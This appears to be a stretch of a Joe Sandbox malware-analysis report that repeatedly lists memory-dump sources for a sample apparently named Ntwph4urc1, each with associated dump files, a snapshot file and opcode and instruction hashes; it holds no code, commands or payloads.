                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d0de6f1a536bfa14fe53989032a97397166e8f78fb9c628f612a51a4f10f55a
                                            • Instruction ID: 18e0e31dead8a3024368cc74c352e20e9f6e93952bbeb4513cad67b57f4c5840
                                            • Opcode Fuzzy Hash: 2d0de6f1a536bfa14fe53989032a97397166e8f78fb9c628f612a51a4f10f55a
                                            • Instruction Fuzzy Hash: 3AC08033080248BBCB125F45CC00F057F29F754770F004010F5040E571C536E960E744
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                            • Instruction ID: 1c531d0e16dc4868d64cdf1281e280ddfe1f6143f94e519506e4c0571c38d337
                                            • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                            • Instruction Fuzzy Hash: 6AC080746515406AEB0F4702CD00B1835546F08755FE0115C7A416A491C35D9402D214
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                            • Instruction ID: ebffd6d1fe5fc48f445762821a027cfd2f13ed0a6743c8ae4b884eaf39b34e08
                                            • Opcode Fuzzy Hash: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                            • Instruction Fuzzy Hash: 29C08C32080248BBCB129A82CC00F127B2AE790B60F000020B6040A571C532ECA0D988
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45bbbd4135af9475b6a439d0080ac2c01854cb23b59f8d31c5ccbb4089c3bfa7
                                            • Instruction ID: d4bf2e70428f8abd758b5db29b2541cd195d36cde0a9bb302fcf6369247b45be
                                            • Opcode Fuzzy Hash: 45bbbd4135af9475b6a439d0080ac2c01854cb23b59f8d31c5ccbb4089c3bfa7
                                            • Instruction Fuzzy Hash: 51D012B191E3C0CED30BCF2C58415113EE5FB09B00B4694BDE045C7715C635440AC615
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2e29a65a52b7967262abf5d65c1ce5d7e03bfc1cb5d62e211a53a750cfccf9df
                                            • Instruction ID: a907f68af3dd05ea59a00d9e7b7ed2a2af67e3014d6605e52a807b71eb98f7c8
                                            • Opcode Fuzzy Hash: 2e29a65a52b7967262abf5d65c1ce5d7e03bfc1cb5d62e211a53a750cfccf9df
                                            • Instruction Fuzzy Hash: 1590026174160802D1407198C518707004B87D0611F55C052A1034518D861A8A6966B1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 26205b893ca526a50afa91c196e0fc917efd35c8dbcb9b1d2ef7d4c40d5af773
                                            • Instruction ID: dd4a540b84cccefbe0a62808e380d49b1cb761cdfd4ff887e9964bd7246c477c
                                            • Opcode Fuzzy Hash: 26205b893ca526a50afa91c196e0fc917efd35c8dbcb9b1d2ef7d4c40d5af773
                                            • Instruction Fuzzy Hash: ED900261701A4442D14072988908B0F414A47E1212F95C05AA5166518CC91989595721
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                            • Instruction ID: d027da0f07426ded71d89b5f59f157300a4cd4453a931cb9cb239cfa3bfe8b2f
                                            • Opcode Fuzzy Hash: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                            • Instruction Fuzzy Hash: A4A02232020880EFCB03EF00CE00F20B330FB00B00FC208A0A30202832822EE800CA02
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                            • Instruction ID: d027da0f07426ded71d89b5f59f157300a4cd4453a931cb9cb239cfa3bfe8b2f
                                            • Opcode Fuzzy Hash: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                            • Instruction Fuzzy Hash: A4A02232020880EFCB03EF00CE00F20B330FB00B00FC208A0A30202832822EE800CA02
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8605e7595db0ec0f08e170466adf3f4f16155db8d22a5cc36c884e71e09009d7
                                            • Instruction ID: f415b2129dbffa7909d67d8b33433d4b3c4774c56f89812a7231865f16f01784
                                            • Opcode Fuzzy Hash: 8605e7595db0ec0f08e170466adf3f4f16155db8d22a5cc36c884e71e09009d7
                                            • Instruction Fuzzy Hash: 5C90027170260142954072989908A4E414A47E1312B95D456A1025518CC91889655221
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fbaac0fb944f58c1eef643734e18e30b7c53953ec1a468e9d941d17dfe2df4ae
                                            • Instruction ID: 0145a950b75eaf9e9b552e4e9d9fdf9674fcd7cc9b44a4b290febbb51205a1e6
                                            • Opcode Fuzzy Hash: fbaac0fb944f58c1eef643734e18e30b7c53953ec1a468e9d941d17dfe2df4ae
                                            • Instruction Fuzzy Hash: AE90027570160402D51071989908646008B47D0311F55D452A143451CD865889A5A121
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 025ee6023eca78f7ab87c64241f9bf8b4c8d1b72dc834c9212ff4b781c45ab71
                                            • Instruction ID: 39d7c7521ca386ce4c9720f6d904237ecf1de466a58897c0658c9cf371a6c2f1
                                            • Opcode Fuzzy Hash: 025ee6023eca78f7ab87c64241f9bf8b4c8d1b72dc834c9212ff4b781c45ab71
                                            • Instruction Fuzzy Hash: 3890026174565102D150719C8508616404A67E0211F55C062A1824558D855989596221
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73d86d0fa559b572b05b3f641e1db783534f13821e8360161e8dc0e47d58f296
                                            • Instruction ID: 22cb2e5c61441dc55e09be4ced12c414a1aca1be1aa152c95f718c7e80e471aa
                                            • Opcode Fuzzy Hash: 73d86d0fa559b572b05b3f641e1db783534f13821e8360161e8dc0e47d58f296
                                            • Instruction Fuzzy Hash: 4A9002A1B0170042414071988908406604A57E1311395C156A1564524C861C89599269
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 330d088961069a85b8c11ed05abe3f82611bd8cba8df390268757de820ec9b6e
                                            • Instruction ID: dcf0705921ccbff5b52204425ce2963b2e7c61dc4f83aba6e52fc3cb84b4875e
                                            • Opcode Fuzzy Hash: 330d088961069a85b8c11ed05abe3f82611bd8cba8df390268757de820ec9b6e
                                            • Instruction Fuzzy Hash: 6F900271B05A0012914071988988546404A57E0311B55C052E1434518C8A188A5A5361
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1f93f02acdb1517f64f5f5eec4f3cc76509de4af37fefe8e348a9096210dc040
                                            • Instruction ID: 3390a2a398a401586dfb3224a25ea6b3f62983fba6a245990c33046918db4f17
                                            • Opcode Fuzzy Hash: 1f93f02acdb1517f64f5f5eec4f3cc76509de4af37fefe8e348a9096210dc040
                                            • Instruction Fuzzy Hash: A6900261B0160502D10171988508616004F47D0251F95C063A2034519ECA298A96A131
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 729d346ef74fdf95e3345bc881e5e66819f6833418680abb78c54ee563018868
                                            • Instruction ID: 318174a203018bc570f12a5507865b5d0a15f1ae05173cb20027630ceb3fb4df
                                            • Opcode Fuzzy Hash: 729d346ef74fdf95e3345bc881e5e66819f6833418680abb78c54ee563018868
                                            • Instruction Fuzzy Hash: 439002B170160402D14071988508746004A47D0311F55C052A6074518E865D8ED96665
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 467effc831146a4b4f8413bd74ce8d262fbd0815b7a82744fc99c7dd14dd8341
                                            • Instruction ID: 6da9087857239f8972caca79b93c8859fef4eba3ef518b70a8c42bcabd3ad721
                                            • Opcode Fuzzy Hash: 467effc831146a4b4f8413bd74ce8d262fbd0815b7a82744fc99c7dd14dd8341
                                            • Instruction Fuzzy Hash: 199002A1701A0403D14075988908607004A47D0312F55C052A3074519E8A2D8D556135
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 314c6553281457dd269d31f854c99378d5acca8d1d476e00b68e1954d3b213dc
                                            • Instruction ID: e1df5fdf1ed058ef51951e8c1bb89c1f85d73900abaede9d58848d410484a3c4
                                            • Opcode Fuzzy Hash: 314c6553281457dd269d31f854c99378d5acca8d1d476e00b68e1954d3b213dc
                                            • Instruction Fuzzy Hash: A090026170160402D10271988518606004E87D1355F95C053E2434519D86298A57A132
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7ff87987347cf9e9396d3eec4ad9c2ba7d9ce3d4e0bf6a632c21806a07472c1b
                                            • Instruction ID: 470dd66de9d3072735c3a844acaffe99e220df0b0f1e586ff9bb9eef89775302
                                            • Opcode Fuzzy Hash: 7ff87987347cf9e9396d3eec4ad9c2ba7d9ce3d4e0bf6a632c21806a07472c1b
                                            • Instruction Fuzzy Hash: 21900271701A0402D1007198891870B004A47D0312F55C052A2174519D862989556571
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cf803062d77de44f73fe1ccce28f569e33b1f6e33780b68f1f0b48d3c7925a80
                                            • Instruction ID: 77bb1a87d12aa591b8c1b7426469184e56cbbbce0a5ed1f0272a0e9e0c11a648
                                            • Opcode Fuzzy Hash: cf803062d77de44f73fe1ccce28f569e33b1f6e33780b68f1f0b48d3c7925a80
                                            • Instruction Fuzzy Hash: 8F900261B0160042414071A8C948906404A6BE1221755C162A19A8514D855D89695665
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 121856a106862a725ebdef52ae10b1e0f08510b1f512262f7710eafabf75b960
                                            • Instruction ID: b1515c5cf2f7179485c81c6f68b098bccd65e5d8e23017298a458b5cdbacf085
                                            • Opcode Fuzzy Hash: 121856a106862a725ebdef52ae10b1e0f08510b1f512262f7710eafabf75b960
                                            • Instruction Fuzzy Hash: 99900271701A0402D1007198890C747004A47D0312F55C052A6174519E8669C9956531
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44449d4862e5005205479fbc5236f8ccd0f45115881f62199826306147a222fd
                                            • Instruction ID: a9ffc0bf965c9108eedd4ab34be576000e312fe267d6baa0cec53908143c5c67
                                            • Opcode Fuzzy Hash: 44449d4862e5005205479fbc5236f8ccd0f45115881f62199826306147a222fd
                                            • Instruction Fuzzy Hash: 5A900261711E0042D20075A88D18B07004A47D0313F55C156A1164518CC91989655521
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 59fb73b0e5376ab417204abf57f77f93fc0c92b93060b169c5c621079709db63
                                            • Instruction ID: 5a17ccf5d1daa3ad4a3328edaee27b422f5b1651142e24d98394a33e1bcc3976
                                            • Opcode Fuzzy Hash: 59fb73b0e5376ab417204abf57f77f93fc0c92b93060b169c5c621079709db63
                                            • Instruction Fuzzy Hash: E59002A174160442D10071988518B06004A87E1311F55C056E2074518D861DCD566126
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce3d22fd23ca730f857a8e105d2f332ef892de9e0b1529e6899ca502b27435c9
                                            • Instruction ID: 85a1390281b529cb91e2be68f17e43579d89e31a1f68fb07580041316c170b4e
                                            • Opcode Fuzzy Hash: ce3d22fd23ca730f857a8e105d2f332ef892de9e0b1529e6899ca502b27435c9
                                            • Instruction Fuzzy Hash: BC9002A171160042D10471988508706008A47E1211F55C053A3164518CC52D8D655125
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ebd9e03274c262e13cabf137c92ee72bf7b9f363b7fb386bc4e84d2495a623e1
                                            • Instruction ID: d909986ce7bd3167e5db4e2a8f2d6acf8a6565163fb6c1c8da3c5e18e4f94e28
                                            • Opcode Fuzzy Hash: ebd9e03274c262e13cabf137c92ee72bf7b9f363b7fb386bc4e84d2495a623e1
                                            • Instruction Fuzzy Hash: 2090027170160402D10075D8950C646004A47E0311F55D052A6034519EC66989956131
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84ada34ad6fba11d1c03fd57e7b7d4dc45b434440e7589facadb8a9a8ceeb877
                                            • Instruction ID: ba0eea74ee76dc4b23d27e012fb6f6b5f513e9b03ef83951be124cffaf63657a
                                            • Opcode Fuzzy Hash: 84ada34ad6fba11d1c03fd57e7b7d4dc45b434440e7589facadb8a9a8ceeb877
                                            • Instruction Fuzzy Hash: C3900261B0560402D1407198951C706005A47D0211F55D052A1034518DC65D8B5966A1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 38de6e257af525511858a7aa2f65a7955e49dcacca0398ce8f92f8d15783e6c8
                                            • Instruction ID: 9ded48169b6ba0351cdff6593cbc110a2d2a12acc9ac6d8f6df3d9aa26e3fe2a
                                            • Opcode Fuzzy Hash: 38de6e257af525511858a7aa2f65a7955e49dcacca0398ce8f92f8d15783e6c8
                                            • Instruction Fuzzy Hash: 9690027170160403D1007198960C707004A47D0211F55D452A143451CDD65A89556121
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
